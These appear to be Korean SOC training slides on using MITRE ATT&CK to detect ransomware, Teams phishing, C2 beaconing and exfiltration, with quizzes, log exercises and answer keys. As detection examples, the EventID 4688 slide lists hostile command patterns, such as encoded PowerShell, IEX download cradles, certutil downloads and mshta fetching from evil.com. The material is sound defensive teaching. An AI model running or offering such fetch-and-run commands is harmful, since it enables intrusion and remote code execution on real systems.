RaaS 모델 + 이중 협박 — 데이터 탈취 후 암호화하는 현대 랜섬웨어의 ATT&CK 체인

랜섬웨어 심화

단계	Technique	LockBit 구체 행위
Initial Access	T1190/T1133	VPN 취약점 또는 구매한 접근권(Initial Access Broker)
Execution	T1059.001	PowerShell + .NET 어셈블리 로드
Persistence	T1543.003	서비스 등록으로 재부팅 후 지속
Privilege Esc	T1078.002	탈취한 도메인 계정으로 권한 상승
Lateral Move	T1021.002	SMB 전파, PsExec 활용
Collection	T1039	파일 서버 전체 데이터 수집
Exfiltration	T1537	Stealbit 도구로 공격자 서버에 데이터 전송
Defense Evasion	T1562.001	EDR 비활성화, Windows Defender 끄기
Impact	T1486+T1490	VSS 삭제 후 전체 파일 암호화 (.lockbit 확장자)

이중 협박 차단 핵심

Exfiltration 탐지가 최우선: 암호화 이전에 데이터 유출을 막으면 협박력 절반 감소
CASB + DLP 연동: 대용량 업로드 즉각 차단 + 사용자 알림
오프라인 백업 필수: 인터넷 연결 없는 백업 → 복호화 키 없이도 복구 가능

🚨 RaaS 현실: LockBit은 Ransomware-as-a-Service 모델로 다양한 위협 행위자가 같은 도구를 다른 TTP로 사용. ATT&CK 매핑은 그룹보다 Technique 중심으로 탐지 설계

보강 설명 LockBit 유형 랜섬웨어 그룹의 TTP를 ATT&CK으로 분석합니다. 초기 침투부터 이중 협박(Double Extortion)까지의 체인과 각 단계별 탐지 포인트를 다룹니다. 시간 순서와 후속 조치를 같이 보면 공격 흐름이 더 또렷해집니다.

LockBit이중 협박Double Extortion

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

실전 케이스: Microsoft Teams를 통한 SaaS 공격

T1566.003 Phishing via Service — Teams 외부 초대로 직원에게 악성 파일 전달

SaaS 공격 시나리오

T1566.003 — Teams 외부 메시지 악용

외부 Microsoft 365 테넌트에서 피해자 직원에게 Teams 채팅 메시지 발송. 기업 설정에 따라 외부 메시지 수신 가능

T1204.002 — 악성 파일 실행 유도

"긴급 계약서" 이름의 .exe 또는 .zip 파일 첨부 → 직원이 다운로드 후 실행

T1059.001 — 페이로드 실행

Teams 클라이언트 프로세스가 악성 실행 파일의 부모 프로세스가 됨 → Teams.exe → PowerShell 체인

T1071 — C2 수립 및 내부 확산

내부 네트워크 접근권 획득 → 추가 피해자에게 내부 Teams 메시지로 악성 파일 확산

Teams 보안 설정 강화

외부 테넌트 메시지 수신 정책 제한 (Teams Admin Center)
외부 파일 공유 비활성화
CASB로 Teams 외부 사용자 파일 다운로드 모니터링
Teams 감사 로그 → SIEM 수집 활성화

탐지 포인트

EDR: Teams.exe가 비정상 자식 프로세스(PS, cmd) 생성
CASB: 외부 테넌트에서 파일 수신 + 즉각 실행
M365 감사 로그: 외부 사용자 메시지 + 파일 다운로드

보강 설명 Microsoft Teams를 통한 피싱과 악성 파일 전달 공격 시나리오입니다. 기업에서 Teams 보안 설정이 부족한 경우 외부 공격자가 Teams 채널을 통해 내부 직원에게 악성 파일을 전달할 수 있습니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1566.003Teams 피싱SaaS 공격

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1566.003 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

보안 운영 성숙도 자가 진단 (12개 항목)

각 항목을 1~3점으로 자가 평가 → 합산 점수로 현재 성숙도 수준 파악

자가 진단

평가 항목	1점 (기초)	2점 (중간)	3점 (고급)
ATT&CK 이해도	용어만 앎	14개 Tactic 설명 가능	Technique별 탐지 설계 가능
SIEM 탐지 룰	기본 룰만 있음	ATT&CK 태그 부착	Coverage 분석 기반 관리
Coverage 분석	미실시	연 1회 실시	분기별 업데이트
헌팅 활동	없음	임시 헌팅	월간 캠페인 운영
로그 수집	기본 로그만	Sysmon + 네트워크	EDR + CASB + 클라우드
탐지 검증	미검증	수동 테스트	Atomic Red Team 자동화

평가 항목	1점	2점	3점
오탐 관리	방치	주간 리뷰	자동 튜닝 시스템
SOAR 자동화	없음	일부 플레이북	Technique별 자동화
CTI 연동	없음	TI 피드 구독	MISP + TTP 자동 매핑
보고 품질	이벤트 나열	체인 설명 가능	30초 보고 + 경영진용
Purple Team	없음	연 1회	분기 운영
ATT&CK 업데이트	추적 안 함	연 1회 리뷰	분기별 룰 업데이트

점수 해석: 12~18점 → Level 1 (기초 개선 필요) | 19~27점 → Level 2 (체계적 운영) | 28~36점 → Level 3 (성숙 운영) — 이번 모듈 수강 후 최소 Level 2 목표

보강 설명 수강생이 자신의 조직 보안 운영 성숙도를 자가 진단하는 도구입니다. 12개 항목을 평가해 현재 수준을 파악하고 다음 단계 개선 방향을 찾습니다. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

보안 성숙도 자가진단12개 평가 항목현재 수준

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
보안 성숙도 자가진단를 고를 때 대체 설명도 함께 적기

ATT&CK Coverage를 보안 예산 계획에 연결하기

탐지 공백의 위험을 정량화해 경영진의 투자 결정 근거를 제공한다

보안 예산 계획

위험 정량화 프레임워크

위협 빈도 (Threat Frequency): 해당 Technique를 사용하는 공격이 업종에서 얼마나 자주 발생하는가 (CTI 기반)
탐지 공백 비용 (Gap Cost): 탐지 못 할 경우 예상 피해 금액 (데이터 유출 평균 비용, 비즈니스 중단 비용)
탐지 개선 비용 (Fix Cost): 해당 Coverage 공백을 메우는 데 드는 비용 (인력, 도구)
ROI: (Gap Cost × Threat Frequency) / Fix Cost — 높을수록 투자 우선순위 높음

Coverage 공백	위협 빈도	예상 피해	개선 비용	ROI	우선도
T1110 Brute Force (0점)	높음	5천만원	500만원	10x	즉시
T1558 Kerberoasting (1점)	중간	3억원	1천만원	30x	즉시
T1567 Cloud Exfil (1점)	높음	10억원	5천만원	20x	Q1
T1486 Ransomware (2점)	높음	50억원	1억원	50x	Q1
T1195 Supply Chain (0점)	낮음	100억원	3억원	3x	Q2

💡 이 표를 경영진에게 제시하면 "왜 이 도구가 필요한가"가 아니라 "이것을 안 하면 얼마의 위험인가"로 대화가 바뀜

보강 설명 Coverage 분석 결과를 보안 예산 계획에 연결하는 방법입니다. 어떤 탐지 공백이 어떤 위험을 만드는지 정량화해 경영진의 투자 결정을 돕는 방법을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

보안 예산ROI 계산위험 정량화

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
보안 예산·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

팀 퀴즈쇼: 모듈 전체 복습 챌린지

카테고리 선택 → 난이도별 문제 → 정답 시 포인트 — 팀 대항 퀴즈쇼

팀 퀴즈쇼

🗺️ ATT&CK 기초

100점

200점

300점

500점

🔍 탐지 분석

100점

200점

300점

500점

🔥 시나리오

100점

200점

300점

500점

🛡️ Coverage

100점

200점

300점

500점

🎯 실전 판단

100점

200점

300점

500점

🏆 진행 방법: 팀 대표가 카테고리와 점수를 선택 → 강사가 해당 문제 제시 → 30초 팀 토론 → 정답 발표 → 맞으면 포인트 획득 · 틀리면 다른 팀 기회 | 최고점 팀 우승!

보강 설명전체 모듈 내용을 팀 퀴즈쇼 형식으로 복습합니다. 카테고리별 문제를 선택해 팀 대항으로 진행하면 재미있게 복습할 수 있습니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

팀 퀴즈쇼모듈 복습카테고리별 문제

설명 확장

팀 퀴즈쇼 기준으로 첫 단서를 먼저 분류하기
모듈 복습를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

퀴즈쇼 문제 모음 — 강사용

카테고리별·난이도별 문제 — 팀 선택에 맞게 제시하시오

팀 퀴즈쇼 문제

ATT&CK 기초

100: Enterprise ATT&CK의 Tactic 개수는? (14개)
200: T1566.001의 Tactic은? (Initial Access)
300: Data Source와 Data Component의 차이는? (카테고리 vs 구체 관찰 항목)
500: Coverage 점수 2와 3의 차이를 설명하고 3점을 달성하는 방법은?

탐지 분석

100: Sysmon EventID 10이 탐지하는 것은? (ProcessAccess - lsass.exe 접근)
200: Password Spraying 탐지 쿼리의 핵심 조건은?
300: Beaconing 탐지 3가지 관점은? (주기성·크기·희귀 도메인)
500: DCSync 탐지에 필요한 WinEvent ID와 탐지 조건은?

시나리오

100: EXCEL.EXE → powershell.exe 체인의 ATT&CK는?
200: vssadmin delete shadows의 Technique와 다음 예상 행위는?
300: Golden Ticket 공격 발견 시 즉각 해야 할 대응은?
500: Log4Shell 공격 체인을 4단계로 ATT&CK 매핑하시오

실전 판단

100: 30초 보고의 4단계 프레임은? (시작·진행·영향·액션)
200: Confidence Medium과 High의 차이를 예를 들어 설명하시오
300: 동시에 발생한 경보 중 DC-01의 lsass 접근과 보안 로그 삭제 중 어느 것을 먼저 처리하고 이유는?
500: 피싱에서 데이터 유출까지의 전체 ATT&CK 체인을 10개 Technique로 설명하시오

보강 설명 퀴즈쇼 문제 모음입니다. 강사가 카테고리와 점수에 맞게 선택해서 제시합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

퀴즈 문제카테고리별 난이도정답 확인

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
퀴즈 문제를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

최종 실습: 나만의 ATT&CK 활용 실행 계획

다음 주 월요일에 바로 할 수 있는 첫 번째 행동부터 — 막연한 다짐이 아닌 구체적 계획

개인 실행 계획

실행 계획 작성 가이드

이름·소속	_______________
현재 역할	☐ SOC 분석가 ☐ 탐지 엔지니어 ☐ 헌터 ☐ 관리자
이번 주 배운 것 중 가장 유용한 것	_______________
월요일 첫 행동	_______________
1개월 목표	_______________
3개월 목표	_______________
도움 필요한 것	_______________
파트너 (서로 체크)	_______________

"월요일 첫 행동" 아이디어

SIEM 경보 1건에 ATT&CK 태그 직접 붙여보기
attack.mitre.org에서 가장 자주 보는 경보의 Technique 페이지 읽기
팀 채팅에 이번 주 배운 ATT&CK 개념 1가지 공유
DetectionLab 설치 시작 (GitHub clone)
가장 오탐이 많은 룰 1개의 원인 분석
Kerberoasting 탐지 쿼리 1개 작성해 테스트

✅ 파트너 제도: 짝을 정해 2주 후 카카오톡·메일로 "월요일 첫 행동 했나요?" 확인 → 서로의 실행을 독려하는 가장 효과적인 방법

보강 설명 수강생이 개인적으로 이번 모듈에서 배운 내용을 실무에 적용하는 구체적인 계획을 작성합니다. 막연한 다짐이 아닌 다음 주 월요일에 바로 할 수 있는 첫 번째 행동부터 시작하는 계획입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

개인 실행 계획첫 번째 행동실무 적용

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
개인 실행 계획를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

📍 마일스톤

Module 5 - 심층 분석 과정

지금까지 200장의 슬라이드를 통해
ATT&CK 기초부터 실전 시나리오, 탐지 엔지니어링,
헌팅, 고급 분석 기법까지 여정을 함께했습니다.
목표 300장까지 계속 이어갑니다.

✅ Part 0~12 기본 과정 (82장) ✅ Technique 심층·로그분석 (33장) ✅ 내부자·클라우드·APT (30장) ✅ SIEM·포렌식·Red Team (30장) ✅ 실전 시나리오·고급분석 (25장)

Windows EventID 심층: 정상 vs 악성 패턴 구분

같은 EventID라도 필드 조합이 결정한다 — 악성 패턴을 식별하는 세부 기준

로그 분석 심층

EventID 4624 — 로그인 성공: LogonType으로 구분

LogonType	의미	정상 케이스	악성 신호
2	대화형(로컬)	직접 PC 로그인	서버에서 Type 2 = 직접 접근 의심
3	네트워크	파일 공유 접근	새벽 + 해외 IP + 민감 서버
5	서비스	서비스 시작	신규 서비스 계정 + 비표준 경로
10	원격대화형(RDP)	원격 접속	연쇄 RDP A→B→C = Lateral

EventID 4688 — 프로세스 생성: CommandLine 패턴

# 정상 패턴 powershell.exe -File C:\Scripts\backup.ps1 # 악성 패턴들 powershell.exe -w hidden -enc JAB... cmd.exe /c "powershell IEX(New-Object...) certutil -urlcache -split -f http://... mshta.exe http://evil.com/run.hta

EventID 4769 — Kerberos TGS: 위험 필드 조합

필드	정상	Kerberoasting 의심
TicketEncryptionType	0x12(AES256)	0x17(RC4)
ServiceName	krbtgt, DC$	MSSQLSvc, HTTP/...
ClientAddress	DC의 IP	비DC 호스트 IP
빈도	1~2건/일	5분 내 5건+

💡 핵심 원칙: EventID 하나만 보지 말고 필드 조합 + 시간 맥락 + 연관 이벤트를 함께 봐야 정확한 판단 가능. 이것이 분석가 역량의 핵심

보강 설명 주요 Windows EventID에서 정상 이벤트와 악성 이벤트를 구분하는 세부 패턴을 다룹니다. 동일한 EventID라도 필드 값 조합으로 악성 여부를… 대표 예시와 로그를 묶어 보면 이해가 빨라집니다.

EventID 패턴정상 vs 악성필드 값 분석

이해 포인트

EventID 패턴를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기

대화형 실습 세트 1: 혼합 로그에서 공격 찾기

5개 소스, 8개 이벤트 — 어떤 것이 공격이고 어떤 것이 정상인가? (10분)

대화형 실습

# [A] VPN 로그 08:45 LOGIN SUCCESS: park.junho | KR | Office-Laptop-01 # [B] EDR 09:12 Word.exe → cmd.exe → powershell.exe -File backup.ps1 # 서명 있는 스크립트, IT팀 계정 # [C] DNS 09:44 QUERY: x2k9a.cloudflare-cdn.net (Age: 2days) src_ip: 10.0.0.88 → VT: 18/94 malicious # [D] FW 09:45~14:32 ALLOW: 10.0.0.88 → 104.21.44.123:443 intervals: 90s±5s | body: 288B±2B # [E] WinEvent 10:02 EventID=4624 Type=3: svc_backup@10.0.0.88 → \\filesvr01 (정기 백업 시간: 03:00 AM)

# [F] File Audit 10:04 ACCESS: \\filesvr01\Finance\Payroll_2024.xlsx User: svc_backup | Not scheduled # [G] Proxy 14:55 POST onedrive.live.com/upload User: 10.0.0.88 | Size: 1.8GB | File: arch.zip # [H] WinEvent 15:11 EventID=4625: svc_backup ×3 failures Then EventID=4624 Type=3 success → \\DC-01 (처음 DC 접근)

분석 과제

① 정상 이벤트와 의심 이벤트 분류
② 의심 이벤트의 ATT&CK 매핑
③ 공격 시작 시점 추정
④ 즉각 취해야 할 액션

보강 설명 실제 SOC에서 받는 것과 유사한 혼합 로그 세트를 분석하는 실습입니다. 여러 소스의 로그를 시간순으로 정렬하고 공격 체인을 구성합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

대화형 실습혼합 로그 세트시간순 정렬

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
대화형 실습를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 세트 1 해설 — 공격 체인과 핵심 연결고리

10.0.0.88 = C2 감염 호스트, svc_backup 계정 악용이 핵심 — B와 A는 정상

대화형 실습 해설

이벤트	판단	ATT&CK	근거
[A] VPN 로그인	정상	—	국내 IP, 등록 디바이스, 업무 시간
[B] Word→PS	정상	—	서명된 스크립트, IT팀 계정, 알려진 파일
[C] 이상 DNS	의심	T1568+T1071	2일 된 도메인, VT 18/94 악성, 10.0.0.88 발생
[D] C2 Beaconing	의심	T1071.001	90초 정확 주기, 크기 일정(288B), 4.8시간 지속
[E] svc_backup 파일 접근	의심	T1078	정기 백업 시간(03:00)이 아닌 10:02에 접근
[F] 급여 파일 접근	의심	T1039	svc_backup이 Payroll 파일 비정상 접근
[G] 1.8GB 업로드	의심	T1567.002	OneDrive에 1.8GB arch.zip, 14:55 업무 후반
[H] DC 접근 시도	의심	T1021+T1078	svc_backup이 DC에 처음 접근 = Lateral Movement

🚨 공격 시작: [C] 09:44 — DNS 쿼리 시 이미 10.0.0.88 감염 완료. C2 연결 후 svc_backup 자격증명 탈취 → 내부 이동

📝 30초 보고: "09:44부터 10.0.0.88이 악성 도메인으로 C2 Beaconing(T1071.001)을 시작했습니다. 이 호스트에서 svc_backup 계정으로 파일 서버 급여 데이터 접근(T1039)과 1.8GB 업로드(T1567.002)가 확인되었습니다. 현재 해당 호스트 격리와 svc_backup 계정 비활성화를 즉시 권고합니다. DC 접근 시도([H])로 Lateral Movement 확산 가능성이 우려됩니다."

보강 설명 실습 세트 1 해설입니다. B는 정상(IT팀 서명 스크립트), A는 정상(국내 정상 로그인)이지만 나머지는 의심 체인입니다. svc_backup 계정이 C2 감염 호스트에서 사용된 것이 핵심 연결고리입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

실습 해설정상 vs 의심svc_backup 연결

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
실습 해설를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

Windows Defender / AV 로그 분석과 ATT&CK 연계

탐지된 위협 이름 → ATT&CK 역추적 · 탐지 우회 시도 파악 · EDR과 교차 분석

AV 로그 분석

Defender 이벤트 로그 위치 및 주요 EventID

로그 위치: Microsoft-Windows-Windows Defender/Operational
EventID 1116: 악성 코드 탐지 (Malware detected)
EventID 1117: 악성 코드 조치 완료 (Action taken)
EventID 5001: 실시간 보호 비활성화 (T1562.001 지표)
EventID 5007: 구성 변경 (정책 조작 가능)

# Defender 탐지 로그 예시 EventID: 1116 ThreatName: Trojan:PowerShell/Meterpreter.gen!A Severity: Severe Path: C:\Users\kim\AppData\Local\Temp\payload.ps1 ProcessName: powershell.exe Action: Quarantine # ATT&CK 역추적 # Meterpreter = Metasploit C2 → T1071 C2 # PowerShell = T1059.001 Execution # %APPDATA%\Temp = 비표준 경로 T1027

AV 탐지 후 분석 절차

1단계: 탐지된 위협 이름으로 ATT&CK 역추적 (Meterpreter → T1071, Mimikatz → T1003)
2단계: 탐지 시점 전후 10분 로그 조회 (언제 어떻게 들어왔는가)
3단계: 격리 전 같은 파일이 다른 호스트에도 있는지 확인
4단계: 격리됐더라도 실행됐다면 이미 페이로드 실행 → 후속 행위 조사

⚠️ 격리 = 안심 금물: AV가 격리했더라도 실행 후 격리된 것이라면 이미 코드가 실행됐을 수 있음. EDR 프로세스 트리로 실행 여부 반드시 확인

보강 설명 Windows Defender와 AV 솔루션의 탐지 로그를 ATT&CK과 연계하는 방법입니다. 탐지된 위협 이름에서 ATT&CK Technique를 역추적하고, 탐지 우회 시도를 파악하는 방법을 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1562.001Windows Defender…AV 탐지 로그

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1562.001 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

피벗 분석 워크숍: 하나의 IOC에서 전체 그림 그리기

C2 IP 하나를 시작점으로 — 도메인·인프라·계정·프로세스를 소용돌이처럼 확장한다

피벗 분석 워크숍

피벗 분석 시작점

탐지된 C2 IP: 185.220.101.78

VirusTotal / PassiveDNS: 이 IP가 과거에 사용한 도메인 목록 → 동일 공격 인프라 연결

내부 DNS 로그: 이 IP로 해석된 도메인 쿼리를 한 내부 호스트 목록 → 감염 범위 파악

같은 도메인 쿼리 호스트: 각 호스트의 프로세스 트리 → 감염 경로 분석

각 호스트의 계정 활동: 감염 시점 전후 로그인 이벤트 → 자격증명 탈취 여부

# 피벗 쿼리 예시: IP → 연관 호스트 # Step 1: 이 IP에 통신한 내부 호스트 index=dns answer="185.220.101.78" | stats values(query) as domains values(src_ip) as infected_hosts # Step 2: 감염 호스트의 의심 프로세스 index=sysmon host IN (infected_hosts) EventCode=1 earliest=-1h@firstDNS | table _time, host, Image, CommandLine

💡 피벗 분석 원칙:
IOC를 확인하고 멈추지 말고, 항상 "이 IOC와 연결된 다른 것은 무엇인가?"를 질문하며 확장. 공격 인프라 전체를 그려야 완전한 대응 가능

보강 설명 피벗 분석은 하나의 발견에서 시작해 연관된 모든 정보를 소용돌이처럼 확장하는 분석 기법입니다. IP에서 시작해 도메인·파일·계정·프로세스를 차례로 연결하는 실전 워크숍입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

피벗 분석연관 정보 확장IOC 피벗

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
피벗 분석를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

탐지 품질 측정: FP/FN 매트릭스와 트레이드오프

모든 것을 탐지하면 오탐 폭발 · 오탐만 줄이면 실제 위협 놓침 — 균형점을 찾는 방법

탐지 품질 과학

탐지 결과 매트릭스

—

실제 공격

실제 정상

탐지 경보

✅ TP
진짜 위협 탐지

⚠️ FP
오탐 (경보 피로)

경보 없음

❌ FN
미탐 (위험)

✅ TN
정상 무시

임계값 트레이드오프

임계값 낮춤 → FP 증가(오탐 폭발) + FN 감소(미탐 줄어듦)
임계값 높임 → FP 감소(오탐 줄어듦) + FN 증가(미탐 위험)
환경별 최적값 다름: 고위험 자산 = FN 최소화 우선 / 일반 환경 = FP 관리 우선

SOC 탐지 최적화 목표

고위험 Technique (T1486 랜섬웨어): FN=0 목표, FP 감수
중위험 Technique (T1059 PS): FP <50%, FN 최소화
저위험 Technique (T1082 Discovery): FP <30% 우선

보강 설명탐지 룰의 품질을 수치로 측정하는 방법입니다. False Positive와 False Negative의 영향을 이해하고, 두 지표 간의 트레이드오프를 관리하는 방법을 다룹니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커…

T1486T1059FP FN 매트릭스

설명 확장

T1486를 목적-기술-근거 관점으로 다시 정리하기
T1059와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

FP FN 매트릭스 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

팀 워크숍: 탐지 시나리오 완전 설계 (20분)

팀별로 다른 Technique 배정 → 완전한 탐지 시나리오를 처음부터 끝까지 설계하라

탐지 설계 워크숍

팀별 배정 Technique

🔴 팀 A: T1055.012 Process Hollowing
🟡 팀 B: T1021.006 WinRM (PowerShell Remoting)
🟢 팀 C: T1098.001 Additional Cloud Credentials
🔵 팀 D: T1136.003 Cloud Account 생성
🟣 팀 E: T1574.001 DLL Hijacking

설계 요구사항

ATT&CK 공식 사이트에서 해당 Technique Detection 섹션 분석
Data Source / Data Component 명시
SIEM 탐지 쿼리 (Splunk 또는 KQL)
오탐 제외 조건 3가지
탐지 시 즉각 대응 플레이북 (3단계)
ATT&CK 태그 포함 Sigma 룰 메타데이터

평가 기준 (팀당 30점)

ATT&CK 분석 정확성: 6점
Data Source 선택 타당성: 4점
쿼리 구체성·실행 가능성: 8점
오탐 처리 현실성: 6점
플레이북 완성도: 6점

💡 참고 링크:
attack.mitre.org → 해당 Technique 검색 → Detection 탭
car.mitre.org → 관련 Analytics 검색
github.com/SigmaHQ → 유사 Sigma Rule 참고

보강 설명 주어진 ATT&CK Technique에 대해 완전한 탐지 시나리오를 설계하는 워크숍입니다. Data Source 선택부터 쿼리, 오탐 처리, 플레이북까지 전 과정을 팀이 함께 설계합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

탐지 시나리오 설계팀 워크숍Data Source

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
탐지 시나리오 설계를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습: CTI 보고서 분석 → ATT&CK TTP 추출

보고서 텍스트에서 공격 행위를 식별하고 Technique ID로 변환하는 핵심 CTI 스킬

CTI 분석 실습

분석 대상 CTI 보고서 발췌 (가상)

"APT-K 그룹은 이메일 첨부파일로 스피어피싱을 통해 침투하며, 피해자가 파일을 열면 매크로를 통해 PowerShell을 실행합니다. 악성 스크립트는 Base64로 인코딩되어 있으며 외부 C2 서버에서 2단계 페이로드를 다운로드합니다.

내부 진입 후에는 net.exe 명령으로 도메인 정보를 수집하고, SMB를 통해 내부 시스템으로 이동합니다. 데이터 탈취 시에는 암호화된 아카이브 파일을 외부 클라우드 스토리지에 업로드합니다."

TTP 추출 결과

강조 행위	ATT&CK Technique
이메일 스피어피싱 첨부파일	T1566.001
매크로 통해 PowerShell 실행	T1059.001 + T1204.002
Base64 인코딩	T1027
외부에서 페이로드 다운로드	T1105
net.exe 도메인 정보 수집	T1069+T1087
SMB 내부 이동	T1021.002
암호화 아카이브 클라우드 업로드	T1560+T1567

보강 설명실제 CTI 보고서(형식)에서 TTP를 추출하고 ATT&CK으로 매핑하는 실습입니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

T1566.001T1059.001CTI 보고서 분석

설명 확장

T1566.001 기준으로 첫 단서를 먼저 분류하기
T1059.001를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

